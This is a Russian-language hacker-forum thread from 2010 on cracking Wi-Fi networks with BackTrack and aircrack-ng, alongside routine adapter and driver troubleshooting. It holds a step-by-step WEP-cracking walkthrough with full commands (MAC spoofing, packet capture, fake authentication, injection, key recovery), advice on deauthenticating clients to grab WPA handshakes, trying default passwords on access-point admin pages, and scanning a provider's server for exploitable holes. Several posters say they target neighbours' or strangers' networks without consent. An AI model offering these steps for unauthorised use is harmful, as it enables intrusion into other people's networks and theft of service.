Так вот чтобы провести чоп-чоп атаку. надо прежде ассоциироваться с ТД. в бактраке 3 финал - всё было без проблем, а вот в бактраке 4 финал я делаю всё стандартным образом, но на попытку асоссоцииации с ТД я получаю вот это

Sending Authentication Request
Authentication successful
Got a deauthentication packet bla bla bla
и так повторяется всё время...

в чём трабла? в третем всё зашибись было!

а карта у меня broadcom4312

пс надеюсь есть знающие люди

Semby68
18.01.2010, 00:57
Здрасте. Я в хаке wifi не ламер. мой прошлый nick - _SEREGA_.
Так вот чтобы провести чоп-чоп атаку. надо прежде ассоциироваться с ТД. в бактраке 3 финал - всё было без проблем, а вот в бактраке 4 финал я делаю всё стандартным образом, но на попытку асоссоцииации с ТД я получаю вот это

и так повторяется всё время...

в чём трабла? в третем всё зашибись было!

а карта у меня broadcom4312

пс надеюсь есть знающие люди

На БТ-4 надо делать fragment atack вроде так это называется.

Сперва меняем мак.

airmon-ng stop wlan0

ifconfig wlan0 down

macchanger -m 00:11:22:33:44:55 wlan0

airmon-ng start wlan0

сканируем эфир:

airodump-ng mon0

выбираем точку и останавливаем airodump-ng //

airmon-ng stop mon0

подсаживаемся на канал :

airmon-ng start wlan0 11

и запускаем airodump-ng / на сбор пакетов

airodump-ng -c 11 -w wep --bssid 11:44:98:56:77:44 mon0

атакуем : подставляем свой изменённый мак при атаке : -h 00:11:22:33:44:55

aireplay-ng -1 0 -a 11:44:98:56:77:44 -h 00:11:22:33:44:55 mon0

в другом окне делаем fragment atack

aireplay-ng -3 -b 11:44:98:56:77:44 -h 00:11:22:33:44:55 mon0

открываем ещё окно и атакуем с фильтрацией нужных пакетов:

aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -b 00:00:00:00:00:00 -h 00:11:22:33:44:55

ждём предложения на открытие пакета :
получив его отрываем fragment paket

Y

запускаем aircrack-ng

aircrack-ng wep-01.cap

hdn
19.01.2010, 13:22
есть у каво eee s101 ?
мужики помогите, ноут asus s101h пытаюсь менять МАК на wifi он меняется но после этого немогу подключиться ни к одной точке доступа даже к своей, пишет что то навроде вы не в зоне действия сети попробуйте обновить список (менял в свойствах адаптера и специальными прогами такая же фигня), фильтрации по МАКам на точках нет, что это может быть? можеть есть какая нибудь хитрость? это всё под Вин. В Линухе подключаться к точке пробовал даже с реальным маком но неполучается

calbo
20.01.2010, 03:48
Здаравствуйте =) Мне нужна ваша помощь у меня ноут HP ProBook 4510s, карточка там Broadcom, смогу ли я на нём работать с AiroWizard???

Зарание спасибо =)

netlex
20.01.2010, 18:31
Почему винда не видет wifi сеть, а bt3 видит?

Incorrect
20.01.2010, 21:55
Всем привет.
Ноут Asus Pro5DAB
Atheros AR9285 802.11b/g Wireless Network Adapter PCI

Есть ли какой-то софт под это дело чтобы вай-фай коцать? Перерыл гугл ниче не нашел толкового. В основных программах поддержки моего адаптера нет.
Такого острого вопроса с нетом не стояло, поэтому когда ноут брал не обратил внимание на это. А счас в Англию жить еду, а там нет проблемно подключать на съемную хату.
Спасибо всем.

ilya107
20.01.2010, 21:59
На БТ-4 надо делать fragment atack вроде так это называется.

Сперва меняем мак.

airmon-ng stop wlan0

ifconfig wlan0 down

macchanger -m 00:11:22:33:44:55 wlan0

airmon-ng start wlan0

сканируем эфир:

airodump-ng mon0

выбираем точку и останавливаем airodump-ng //

airmon-ng stop mon0

подсаживаемся на канал :

airmon-ng start wlan0 11

и запускаем airodump-ng / на сбор пакетов

airodump-ng -c 11 -w wep --bssid 11:44:98:56:77:44 mon0

атакуем : подставляем свой изменённый мак при атаке : -h 00:11:22:33:44:55

aireplay-ng -1 0 -a 11:44:98:56:77:44 -h 00:11:22:33:44:55 mon0

в другом окне делаем fragment atack

aireplay-ng -3 -b 11:44:98:56:77:44 -h 00:11:22:33:44:55 mon0

открываем ещё окно и атакуем с фильтрацией нужных пакетов:

aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -b 00:00:00:00:00:00 -h 00:11:22:33:44:55

ждём предложения на открытие пакета :
получив его отрываем fragment paket

Y

запускаем aircrack-ng

aircrack-ng wep-01.cap

есть пару вопросов)
что в конце подставлять в 00:00:00:00:00:00 и FF:FF:FF:FF:FF:FF?

пакеты идут во всех окнах, какие учитывать?

4tnight
20.01.2010, 21:59
Здаравствуйте =) Мне нужна ваша помощь у меня ноут HP ProBook 4510s, карточка там Broadcom, смогу ли я на нём работать с AiroWizard???

Зарание спасибо =)

Это ты сможешь узнать только установив AiroWizard!

popow_sergei
20.01.2010, 22:01
Atheros AR9285 802.11b/g Wireless Network Adapter PCI
b/g/n он .

я тоже обладатель данного девайса , и тоже ощутил проблему с win программами
зато в linux все тип топ , но пока только осваиваю .

calbo
20.01.2010, 23:06
Это ты сможешь узнать только установив AiroWizard!

Установил... Но вот он не сканирует ((( Нажимаю Start Monitoring и оно 1 секунду работает и сразу вырубается((((( Что можете подсказать по этому поводу?=)

user_bad
21.01.2010, 15:04
Установил... Но вот он не сканирует ((( Нажимаю Start Monitoring и оно 1 секунду работает и сразу вырубается((((( Что можете подсказать по этому поводу?=)
broadcom под виндовсом с аэровизардом не работает сообственно и с аиркраком

4tnight
21.01.2010, 15:38

Посоветую BT3 или 4 ставь!

calbo
22.01.2010, 01:12
Спасибо большое ))) Буду пробывать ))

Kastor
23.01.2010, 06:50
Скажите, кто нибудь пробовал менять мак адрес адаптера?
У меня ноутбук Aspire one, адаптер Atheros AR5007eg. Я менял в ХР мак адрес (первые три значения я оставлял 00:22:68, так как это говорит о том, что адаптер асеросовский), но ни к одной беспроводной сети я не мог подключиться. В Убунту 9.04 тоже пробовал. Менял вот так

ifconfig ath0 hw ether 00:22:68:ba:75:12

к своей точке доступа подсоединяюсь нормально, но пингануть ее не могу. ip везде стоят из одной подсети. Кто сталкивался со сменой мак адресов? Проблемы были или все гладко работало?

tt-44
23.01.2010, 22:26
подскажите програмы для вардрайвинга, Адаптер Atheros AR9285 wireles network adapter, ОС Vista ultimate sp2, немогу разобратся с перехватом ключей, подскажите!!!
И еще вопрос какой модуль ядра с моим адаптером в BT3 немогу произвести атаку

popow_sergei
23.01.2010, 23:42
подскажите програмы для вардрайвинга, Адаптер Atheros AR9285 wireles network adapter, ОС Vista ultimate sp2, немогу разобратся с перехватом ключей, подскажите!!!
Про win забудь .
Я BT4 гоняю , все работает .

DeepSy
23.01.2010, 23:43
Спасибо большое ))) Буду пробывать ))

такая же трабла.
ничего не вышло((

tt-44
24.01.2010, 00:16
Про win забудь .
Я BT4 гоняю , все работает .
Адаптер тот же?

popow_sergei
24.01.2010, 00:22
Адаптер тот же?
да

tt-44
24.01.2010, 00:48
да
что ты в modprobe -r ставиш? или опиши сам взлом на BT с этим адаптором, у меня wifi не видет, мож невключаю модуль какой?

popow_sergei
24.01.2010, 23:53
modprobe -r такое даже не видел .
Все делаю по инструкциям на форуме.

Alexandrcvet
26.01.2010, 00:57
Всем доброго времени суток. Пожалуйста не пинайте, я новичек. Форум читал, но информации много, не нашел ситуации как у меня. После установки дров на нетбук Samsung 308 (чипсет Atheros AR 5007EG) сразу появилось сообщение, что найдена беспроводная сеть «HOME»,что сигнал очень слабый(одна палочка) и сеть незащищенная. Однако я без проблем вышел в инет(скорость показыв. 54 М/cек). И от души полазил в Интернете. Это продолжалось 2дня. После этого выйти больше не мог, комп. писал что соединения либо нет, либо доступ ограничен. Я понял что мне запретили доступ. Загорелся взломать точку, стал читать литературу, собирать проги для взлома. После установки Commview for WIFI (чипсет стал определяться как Atheros AR5006X) я увидел что сеть «HOME» вообще не имеет шифрования и что всего то нужно (как написано на форуме) подставить любой IP-адрес отображающийся в Commview. Адрес IP я прописал(пробовал разные, их в проге отображалось много),комп затребовал маску подсети, т.к. у меня на не ее данных нет, я опять нажал ОК и маска прописалась какая-то автоматом. После этого комп показал, что WIFI соединение с сетью «HOME» установлено. НО в инет я выйти не могу,хотя сигнал в некоторых углах комнаты 25%. Вопрос: что я делаю неправильно,в чем моя ошибка?
Пробовал вернуться к родным дровам, но ситуация та же. Беспроводное соединение с сетью установлено, а Интернета нет. Чудеса! Может надо еще какие-то параметры прописывать! Спасибо за ответ!

Kastor
26.01.2010, 05:02
Alexandrcvet, у меня такой же адаптер на ноуте. А в CommViewForWiFi есть драйвера не под все адаптеры, в частности под наш нету, но есть под его предыдущую версию который канает. Правда у меня на этих дровах при работе в сети ноут иногда зависает, поэтому использую их только когда работаю с CommView. Жаль ты не записал сетевые настройки, когда они автоматом выдавались. Щас бы вбил их и возможно все работало бы. Наверное надо шлюз правильный прописать, а может там теперь выход в инет через прокси-сервер. Попробуй понаблюдать за работой сети в CommView. Может увидишь какие пакеты от какого ip к какому летят и разберешься что к чему.

Kastor
26.01.2010, 05:07
Щас еще мысля посетила. Если на сеть пароль не поставили, попробуй вломиться в настройки точки доступа. Подключаешься к сети, сканируешь этот диапазон ip адресов каким нибудь сканером и находишь то сетевое устройство, на котором открыт 80-й порт. На АР он обычно открыт, чтобы можно было через веб-интерфейс их настраивать. Нашел ip, вводишь его в браузер и должно появиться окно для ввода пароля. Пробуй стандартные (и запиши название точки доступа). Если пройдешь внутрь, то полазь в настройках сетевых, там должен быть шлюз.

mff
28.01.2010, 11:29
Есть интернет через ADSL модем + PCI карта D-LINK DWA 547 на одном компе и на другом PCI карта D-LINK DWL G550

Нужно настроить сеть между компами и дать инет через WIFI

Подскажите, что в этих картах нужно настраивать? Что писать в свойствах TCPIP ? Что можно почитать по теме?

Спасибо.

Kastor
28.01.2010, 17:55
Если в ADSL модем встроена точка доступа, то можно создать инфраструктуру. То есть интернет будет приходить через ADSL и раздаваться остальным компьютерам по Wi-Fi.

А если точки доступа нет, то придется создавать одноранговую сеть, то бишь без точки доступа. Но это не очень удобно. Придется подключить компьютер к модему (витой парой) чтобы получать интернет, а потом еще между компьютерами настроить ту самую adhoc сеть и при этом разрешить использовать модемное соединение всем пользователям беспроводной сети. Я описывал создание такой сети вот здесь
http://liveofpc.ru/publ/1-1-0-123
там используются средства виндовс, но с адаптерами идут драйвера и специальные программы, которыми тоже можно воспользоваться.

Если возникнут вопросы, описывай их поподробнее. Попробуем разобраться вместе.

Semby68
28.01.2010, 18:52
есть пару вопросов)
что в конце подставлять в 00:00:00:00:00:00 и FF:FF:FF:FF:FF:FF?

пакеты идут во всех окнах, какие учитывать?

aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -b 00:00:00:00:00:00 -h 00:11:22:33:44:55 mon0

aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -b ---- эту строку пишешь как есть

где 00:00:00:00:00:00 ---в место нулей bssid точки

-h 00:11:22:33:44:55 mon0 --- это твой bssid который менял раньше

в других окнах пусть пакеты бегут само собой
следи за этим окном , жди предложения на открытие этого пакета p 084

после сбора 11000 пакетов запускаешь
aircrack-ng --не закрывая ни каких окон
--- 11000 --смотришь в airodumpe --
и ожидаешь ключ сети
aircrack-ng --сам будет добавлять пакеты если их мало

если интересует можешь зайти по этой ссылке --
http://www.corelan.be:8800/index.php/2009/02/20/cheatsheet-cracking-wep-with-backtrack-4-and-aircrack-ng/

xxakerx
28.01.2010, 22:55
Простите за глупый вопрос но все таки я его снова подниму....

Операционная система Vista.
Поиска WI FI сетей и там находит безымянную сеть не зашифрованную....
Как к ней подключиться и узнать ее имя? Другой операционки нету и поставить нет возможности(

F&D
28.01.2010, 23:49
Прочитал множество инфы, вроде все понял, но у меня на ноуте ASUS карта Atheros A9285 Wireless Network Adapter(встроенная). И как я понял, она по идее, не подходит не под один способ, из всех которые я нашел на форуме, и вообще...

popow_sergei - сказал что, да, мол, не подходит. И что в BT4 у него всё работает с этим адаптером.

И если я правильно понял, мне осталось достать BT4, залить его на флешку и будет мне счастье? Или может еще что нибудь необходимо?!

Заранее благодарю.

cuttercreator
29.01.2010, 01:08
Прочитал множество инфы, вроде все понял, но у меня на ноуте ASUS карта Atheros A9285 Wireless Network Adapter(встроенная). И как я понял, она по идее, не подходит не под один способ, из всех которые я нашел на форуме, и вообще...

popow_sergei - сказал что, да, мол, не подходит. И что в BT4 у него всё работает с этим адаптером.

И если я правильно понял, мне осталось достать BT4, залить его на флешку и будет мне счастье? Или может еще что нибудь необходимо?!

Заранее благодарю.

Да именно так. Карточка работает в BT4

F&D
29.01.2010, 01:26
Да именно так. Карточка работает в BT4

Огромное спасибо. Буду пробовать.

Pack
30.01.2010, 14:02
D-Link DWL-2100AP ver.2.30eu как получить конфиг не зная пароля и логина?

Supermanoff
31.01.2010, 22:33
Взял вот такой маршрутизатор (http://netgear.ru/?page=products/routers/rangemaxnextwirelessroutersandgateways/wnr2000/index) всё нормально!

НО не могу нормально смотреть онлайн видосы, сначало полностью видос грузится в кэш, а потом только воспроизводится) такая же ситуация с онлайн музыкой и скачкой файлов...

Что делать?)

soter
01.02.2010, 00:47
Помогите, пожалуйста: после использования AiroWizard не запускается WiFi-адаптер :(
Подробнее здесь:
http://forum.antichat.ru/thread175121.html

Заранее премного благодарен!

cLauZ
01.02.2010, 00:51
Помогите, пожалуйста: после использования AiroWizard не запускается WiFi-адаптер :(
Подробнее здесь:
http://forum.antichat.ru/thread175121.html

Заранее премного благодарен!
Попробуй дрова переустановить или обновить..

soter
01.02.2010, 00:56
Попробуй дрова переустановить или обновить..
Пробовал и то, и другое.

wMw_
01.02.2010, 14:30
Ну вот я хакнул точку, законектился - я внутри...
Что дальше делать ? :D Что вы делаете ?

Elvis000
01.02.2010, 14:49
Ну вот я хакнул точку, законектился - я внутри...
Что дальше делать ?

Реализовывать то, для чего хакнул. Если от нечего делать, оставить сообщение хозяину о уязвимости, выйти и перейти к следующей.

soter
01.02.2010, 16:55
Помогите, пожалуйста, включить адаптер (см. выше, а также здесь (http://forum.antichat.ru/thread175121.html)) :)

Я, вроде, не чайник, и проблем много разных решал - но с такой странной в первый раз встретился :(

soter
02.02.2010, 16:15
В общем, есть у меня смутное подозрение, что AiroWizard ввел устройство в режим мониторинга, а вывести из этого режима не смог.

Просто вспомнил последние свои действия - ввел в режим мониторинга, а потом решил задизейблить устройство зачем-то. После этого и началась свистопляска. Профи, помогите!

boykent
03.02.2010, 22:53
привет всем! нужна ваша помощь!!!Значит у одного знакомого есть интернет которым он сам пользуется через вафай!я с его разрешения попробовал взять инет от него через вафай, у меня есть писи карта D-Link DWA-520 в компе и есть точка доступа D-Link DAP-1150, есть самодельная антена ФА-20.Значит вот в чём проблема,комп стоит далеко от антены и происходят большие потери по кабелю,подвинуть ближе не могу,длина кабеля состовляет 13 метров!!! Точку знакомого адаптер видет но подключится не могу! мне подсказали решение в магазине то что я могу с помощью моей точки доступа подключится к знакомому и исчезнет вопрос с потерей по кабелю. Вообщем вопрос такой, могу ли я использовать мою точку доступа как адаптер для приема интернета по вафай,или может есть какоето другое решение по моему вопросу?

Kastor
04.02.2010, 04:48
У меня такая же точка доступа. Она может кроме режима Инфраструктура работать еще как ретранслятор и как клиент. Попробуй сделать следующее: узнай какие настройки в сети у твоего товарища, потом поставь в сетевых настройках точки такие же (конечно последний октет ip-шника должен быть уникальным), на компе поставь настройки из той же сети (конец ip так же другой придумай). Далее, с зади на АР есть переклюатель, выставь в положение "Client". Потом в браузере пропиши ip точки доступа, который ты ей присвоил. И на вкладке Wireless (кажется), рядом с полем где надо бы выбрать название сети (оно вроде бы в режиме клиента не активно, щас просто влом точку идти включать, думаю найдешь) будет кнопка Site Survey (что то такое, если надо, потом посмотрю и точно скажу). Жмешь ее, АР начнет сканировать эфир и выведет окно со списком найденных сетей. Выбираешь свою и жмешь Connect. Все должно заработать, я так же делал. Если что, подробнее описывай что не так, попробуем разчехлиться.

Kastor
04.02.2010, 04:51
Я ошибся немного. Сначала переключи АР в режим клиента, и только потом меняй ей ip. Дело в том, что она хранит сетевые настройки для всех трех режимов отдельно. В режиме инфраструктуры будет один ip, в режиме клиента - другой.

boykent
04.02.2010, 15:33
Я ошибся немного. Сначала переключи АР в режим клиента, и только потом меняй ей ip. Дело в том, что она хранит сетевые настройки для всех трех режимов отдельно. В режиме инфраструктуры будет один ip, в режиме клиента - другой.

Спасибо уже разобрался.А насчет взлома точка доступа может это делать например моя?и вообще по параметрам нормальная точка доступа или может помошнее взять(просто впервый раз купил такую вещь)

Kastor
04.02.2010, 17:59
Вероятно нет. Все на что она способна в этом плане, так только сканировать эфир и то через веб интерфейс, что очень неудобно. При помощи DWA 520 тоже не повардрайвить, разве что на балкон вынести системный блок.
Можно usb-шные адаптеры втыкать в ноут и что то пробовать, или использовать встроенные. Но usb-шные адаптеры не поддерживают некоторые проги, CommViewForWiFi например. И встроенные не всегда подходят, мне вот повезло, моя может и мониторить, и инжектить пакеты (как я понял, еще следует мне в этом разбираться).
И как говорят многие источники лучше всего иметь ноут с PCMCIA карточкой Prism или Prism2, которые умеют "все на свете".

Kastor
04.02.2010, 18:12
Забыл добавить на счет помощнее. Врядли ты найдешь точку которая будет намного мощнее твоей. Во всяком случае стоить она будет дороже, чем антенна. Лучши купи антену себе, или все направленную или остронаправленную (тут как тебе удобнее будет). На DAP 1150 можно открутить стандартную антену и прикрутить новую, разьем там RP-SMA. Уверен найти такую антену будет не сложно. Усиление стандартной 2dBi, я видел в магазинах на 6 и 7 dBi.
Для примера посмотри на сайте длинка такие антены как:
ANT24-0600
ANT24-0700
и им подобные. Мне кажется целесообразнее купить антену, АР вроде нормальная, нареканий пока нет.

rom33
04.02.2010, 20:14
была wep точка-успешно поломанная-потом она показалась как окрытая-но на странице входа требует авторизации-логин и пароль-пожалйста -расскажите как быть?есть бт3 и бт4 с нужной картой ,спасибо!

boykent
04.02.2010, 21:28
Забыл добавить на счет помощнее. Врядли ты найдешь точку которая будет намного мощнее твоей. Во всяком случае стоить она будет дороже, чем антенна. Лучши купи антену себе, или все направленную или остронаправленную (тут как тебе удобнее будет). На DAP 1150 можно открутить стандартную антену и прикрутить новую, разьем там RP-SMA. Уверен найти такую антену будет не сложно. Усиление стандартной 2dBi, я видел в магазинах на 6 и 7 dBi.
Для примера посмотри на сайте длинка такие антены как:
ANT24-0600
ANT24-0700
и им подобные. Мне кажется целесообразнее купить антену, АР вроде нормальная, нареканий пока нет.

спасибо за подробный ответ,антена у меня есть самодельная фа20.

Kastor
04.02.2010, 22:15
была wep точка-успешно поломанная-потом она показалась как окрытая-но на странице входа требует авторизации-логин и пароль-пожалйста -расскажите как быть?есть бт3 и бт4 с нужной картой ,спасибо!

Смотри, если бы там поставили новый WEP или WPA то требовался бы только пароль (без логина) и то не всеми программами выводится приглашение его вписать. А тебе еще надо знать логин, к тому же АР открытая. Я так думаю, эту сеть специально сделали открытой, присоединиться к ней может любой желающий, но что бы полноценно в ней работать (допустим доступ в интернет или к определенным ресурсам сети) необходимо знать (вероятно приобрести, может карточки продаются где то или кем то) логин и пароль. И получение этих данных не осуществишь теми способами, что здесь описывались при взломе WEP и WPA (да их тут просто нет, как я понял). Так что тебе надо ломать сервер, где хранятся учетные записи пользователей с паролями. Это чья сеть? Частная у кого то дома, или в публичном месте находится (кафе, почта, гостиница)? Какое ее название? Если оно похоже на название одного из провайдеров (или название их тарифов, услуг) то тут все понятно.

спасибо за подробный ответ,антена у меня есть самодельная фа20.
Здорово! Меня тоже посещала мысль сделать свою, а то тратиться на фирменную пока нет ради чего.

rom33
05.02.2010, 02:17
да именно,вы правы-ломать сервер-а как?

Kastor
05.02.2010, 03:27
да именно,вы правы-ломать сервер-а как?

Я таким еще не занимался. Эта задача уже мало относится к беспроводным технологиям. Вероятно придется сканировать сервер, искать на нем уязвимости, искать соответствующие эксплойты и в таком духе.

ViinniPux
06.02.2010, 15:17
Ребята помогите, у меня такая проблема: купил я себе Orient XG-701a+ с внешней антенной, ну тот что указан на первой странице в списке рекомендованных. Там оказался чипсет Atheros AR5007UG, запускаю airodump, он такого чипа не знает. Установил CommView, оказалось что и там этот чипсет не поддерживается! Все это я делал под Вистой. Подскажите возможна ли работа с таким чипом под какой-либо ВИНДОЙ и какие дрова тогда нужно ставить???

Kastor
06.02.2010, 23:58
Возможно ты опечатался и там чипсет Atheros AR5007eg. У меня такой же, только встроенный в ноут. В CommViewForWiFi под него драйвера нет, но есть под Atheros AR5006eg, который нормально работает с таким адаптером как у нас, но только в CommView. Если я с этим драйвером пытаюсь работать в сети через другие программы, то комп виснет намертво. А airodump у меня тоже не работает. Видать не судьба.

В документации по CommView кажется сказано, что usb-шные адаптеры программа не поддерживает. Надеюсь, это не так, но мой dlink dwa110 работать не хочет.

Вот здесь есть небольшой обзор этого адаптера:
http://darksa.ru/?p=166
сказано, что он поддерживает все радости вардрайвера (монитор, инжект). Попробуй его запустить под BackTrack3.
Если заработает, то это будет здорово. Мне он приглянулся, была бы возможность, поменял бы свои два dwa110 на него, а то они какие то тормознутые.

ViinniPux
07.02.2010, 02:02
Нет я не опечатался, чипсет действительно AR5007UG.

Kastor
07.02.2010, 07:00
Да, действительно. Есть такой чипсет. Оказывается AR5007UG, это тоже, что и ZyDAS zd1211rw.
На сайте CommView (http://www.tamos.ru/products/commwifi/adapterlist1.php) в списке поддерживаемых адаптеров упоминается только Atheros Wireless Network Adapter (AR5001 through AR5007), без каких либо символов после цифр. Может он поддерживает любые "модификации" AR5007 (всмысле, с любыми буквами в довесок)?

А еще нашел, что BactTract3 поддерживает Zydas zd1211rw, что и есть твой чип. Так что, вероятно, под этой осью все получится.

ViinniPux
07.02.2010, 10:08
На сайте CommView написано то так, но на самом деле поддерживаются не все чипсеты, а лишь некоторые, моего там нет... Буду пробовать BackTrack 3, может что-нибудь получится... Просто мне хотелось использовать адаптер и под ВИНДОЙ. Кстати если это тоже самое что и ZyDAS zd1211rw, то может поставить дрова от него? Только вот точно бы знать какие.

OrangeLik
07.02.2010, 11:08
Добрый день:)
Вот я получил ключ от сети wep
10:23:38:56:78 и куда его вводить?:) если его просто как пароль, то не подключается..х

scorpic393
07.02.2010, 11:15
Добрый день:)
Вот я получил ключ от сети wep
10:23:38:56:78 и куда его вводить?:) если его просто как пароль, то не подключается..х
без двоеточий вводи

OrangeLik
07.02.2010, 12:23
без двоеточий вводи
Ну я и так без двоеточий вводил... Странно
А он может неправильный ключ найти?:)

Sergik!
07.02.2010, 17:59
нe подскажете, возможно ли запустить TL-WN422g с AiroWizard?
ну или с bt4?

OrangeLik
07.02.2010, 18:17
http://i069.radikal.ru/1002/20/62a41afc64ad.jpg
(невозможно подключиться)
в чем проблема?
вчера её ломал, меня по МАС забанили? оО

Kastor
07.02.2010, 18:33
Просто мне хотелось использовать адаптер и под ВИНДОЙ. Кстати если это тоже самое что и ZyDAS zd1211rw, то может поставить дрова от него? Только вот точно бы знать какие.
В интернете можно спокойно найти драйвера как под ZyDAS zd1211rw, так и под AR5007ug (правда я тогда не понимаю, какая разница, если это одно и тоже). Но с ними CommView и Airodump врядли заработают. А диск с адаптером был? Интересно, там дрова под что.

А он может неправильный ключ найти?
А кто он? Aircrack? Может. У меня тоже так было. Я с домашней сетью экспериментировал, и если насобирать маловато пакетов, то при очередном подборе ключа результат будет новым. Но процентов 70 выводил правильный.

OrangeLik
07.02.2010, 18:55
А кто он? Aircrack? Может. У меня тоже так было. Я с домашней сетью экспериментировал, и если насобирать маловато пакетов, то при очередном подборе ключа результат будет новым. Но процентов 70 выводил правильный.
да. я собрал около 50к.
а по МАС адресу точка доступа могла сама забанить?)

Kastor
07.02.2010, 19:18
да. я собрал около 50к
50 тысяч? Это же очень мало. Надо как минимум 200, а еще лучше 500 (я именно после 500 тысяч подобрал правильный ключ). Но это без всяких хитрых атак, а просто сбор пакетов.

а по МАС адресу точка доступа могла сама забанить?)
Типа, такая себе интеллектуальная АР? Врядли)

OrangeLik
08.02.2010, 11:43
подскажите пожалуйста, что подразумивается под "сбором пакетов"?
Airodump-ng -c () --bssid () -w capture wlan0
Тут собираются?:) тут надо 500к пакетов собрать? Оо
А что тогда это и что делает?
Airplay-ng -2 -r arp-request wlan0

Kastor
08.02.2010, 13:57
подскажите пожалуйста, что подразумивается под "сбором пакетов"?
Airodump-ng -c () --bssid () -w capture wlan0
Да, тут собираются, на определенном канале и с АР по указаному мак-адресу. Вот тут подробное описание по этой программе. Жаль, с моим адаптером она не работает.
https://forum.antichat.ru/showpost.php?p=474239&postcount=1

Я так понял тебе надо WEP сломать. Если коротко, то чтобы сломать его, надо насобирать 500к пакетов с векторами инициализации (IV), которые из за своего маленького размера имеют место повторяться. Поэтому при их большом кол-ве можно и подобрать ключ.

А что тогда это и что делает?
Airplay-ng -2 -r arp-request wlan0
Если честно, не знаю) Но вобщето эта программа используется для нагнетания трафика разными средствами. Кажется она может реассоциировать узлы от сети, что бы те повторно подключались и отпавляли еще больше пакетов. Поищи ее описание, и вобще, зачем она тебе нужна?

progMan
08.02.2010, 14:33
Подскажите, какой адаптер подходит для вардайвинга из ниже перечисленных, и желательно чтобы подешевее: Orient XG-701A+(532руб.), Trendnet TEW-424UB(612руб.), Dlink DWA-120(964руб.).
И ещё один вопрос, подойдёт ли для этого дела моя встроенная карточка, Broadcom 802.11g Network Adapter? В CommView for WiFi она вроде поддерживается (в win 7 и виста, у меня 7-ка), но дрова ставить не хочет, ведаёт ошибку. Никто не сталкивался с такой проблемой?

Sergik!
08.02.2010, 15:38
и все же, подскажет кто по TP-Link TL-WN422g? работает кто с ней?

Kastor
08.02.2010, 16:39
Могу сказать, что Dlink DWA-120 полная лажа. Они даже просто как клиенты работают с лагами. Какой там вардрайв.
Из этих трех, самая прикольная это Orient XG-701A+ (еще и самая дешевая). Она даже есть в списке пригодный для вардрайвинга на эттом форуме, еще есть разьем под антенну. Я бы взял ее.

progMan
08.02.2010, 16:57
самая прикольная это Orient XG-701A+
Я сам уже стал склоняться к ней. А она с какими прогами хоть работать будет? У CommView например её в списке поддерживаемых нет.

OrangeLik
08.02.2010, 18:34
На счет адаптера, у меня asus wl-167g ловит хорошо, легкий ^^ 670р

Kastor
08.02.2010, 20:16
Я сам уже стал склоняться к ней. А она с какими прогами хоть работать будет? У CommView например её в списке поддерживаемых нет.
Airodump и CommViewForWiFi работать с ним, как я понял, не будут. А вот в BactTrack3 надеюсь все заработает.

VinniPux, скажи пожалуйста, ты пробовал этот адаптер (Orient XG-701A+) под BT3?

На счет адаптера, у меня asus wl-167g ловит хорошо, легкий ^^ 670р
А с какими программами ты его пробовал, если не секрет?

vmg33
08.02.2010, 20:46
Народ всем привет! Подскажите, пытаюсь разобратся с WI-fi. Такой вопрос. У соседий есть wi-fi, комп ловит беспроводные соединение( их много). как можна узнать провайдеров и к ниму подключится( платно).или как вобще можна подключится ?
Зарание спасибо!

Kastor
08.02.2010, 22:15
vmg33, я так понял, ты хочешь подключиться к интернету без всяких приколов со взломами, по честному)
Можно просто обзвонить соседей и сказать, что мол давайте будем за инет платить вдвоем по половине, а вы мне датите пароль от беспроводной сети, через которую я и буду сидеть.

Хотя, если сети открытые (т.е. не требуют пароля, для подключения), можешь попробовать подключиться без их ведома. После подключения (если настройки выдались автоматически) попробуй выйти в инет. Такие легкие случаи до сих пор встречаются. Учитывая, что сетей у тебя ловится много, то все может быть.

vajder
09.02.2010, 01:27
Народ подскажите почему при запуске аirodumpa c одной сети собирает пакеты,а с другой 0, при том что сигнал одинаковый.

Kastor
09.02.2010, 02:31
Народ подскажите почему при запуске аirodumpa c одной сети собирает пакеты,а с другой 0, при том что сигнал одинаковый.

Попробуй указать в параметрах при запуске airodump, мак адресс той точки, скоторой ты хочешь собирать пакеты. Если после этого там все равно будет 0, возможно кто то просто настроил АР, но к ней никто еще не подключился.

Sergik!
09.02.2010, 08:38
и все же, подскажет кто по TP-Link TL-WN422g? работает кто с ней?

попробовал БТ4, команда iwconfig сказала что ничего нет :( хотя в юсб девайсах он отображает что есть wlan и что чипсет Atheros
один фиг неполучается запустить

OrangeLik
11.02.2010, 07:50
подскажите пожалуйста, как перекинуть файлы с винды на БТ? и почему когда я выхожу ид БТ все созданные файлы удаляются и вообще каждый раз как заново гружусь? :(

Kastor
11.02.2010, 12:35
А ты с диска или флешки грузишься? Хотя это наверное не важно. Меня тоже такой вопрос интересует. Как, допустим БТ на флешку записан, в него же добавить некоторые рограммы?

OrangeLik
11.02.2010, 14:43
А ты с диска или флешки грузишься? Хотя это наверное не важно. Меня тоже такой вопрос интересует. Как, допустим БТ на флешку записан, в него же добавить некоторые рограммы?

С флешки. Где то читал что надо какой то файл править, но я забыл какой =/

progMan
12.02.2010, 13:00
Подскажите сколько надо отснифать пакетов у сетки WPA2 для того чтобы потом aircrack-ом брутфорсить, надо ли пользоваться aireplay? C WEP вроде всё понятно, отловить момент подключения и собрать 200-500к пакетов, с WPA также или нет?

Kastor
12.02.2010, 15:04
Подскажите сколько надо отснифать пакетов у сетки WPA2 для того чтобы потом aircrack-ом брутфорсить, надо ли пользоваться aireplay? C WEP вроде всё понятно, отловить момент подключения и собрать 200-500к пакетов, с WPA также или нет?

Ты наверное что то напутал. Как раз при взломе WEP ненадо отлавливать подключсение. Достаточно просто так насобирать 200-500кило пакетов. А при взломе WPA надо словить пакет, который отсылается при подклчении в АР. И все. Вот чтобы его поймать, надо ждать пока клиент не присоединиться или деаутентифицировать его самому уж при помощи aireplay.

progMan
12.02.2010, 21:17
Понятно, спасибо за помощь.

TENMAX
13.02.2010, 23:37
Не знаете почему PSP не принемает WEP подключения, пишет нельзя соединиться, пароль и тд ввёл правильно, что делать?

Bulder
16.02.2010, 15:48
Привет всем.есть вопросик-как обеспечить анонимность при входе в инет через Wi-Fi со смарта или ноута(так что нельзя было определить IP)?Заранее благодарен...

OrangeLik
16.02.2010, 17:20
подскажите пожалуйста, все таки сколько IV пакетов надо для взлома?
я собирал пакеты
И вдруг всегда вылезает где клиенты видны:

fwrite(packet data) failed: Nospace left on device
ключ конечно не нашел)

и таких пакетов надо 200к?
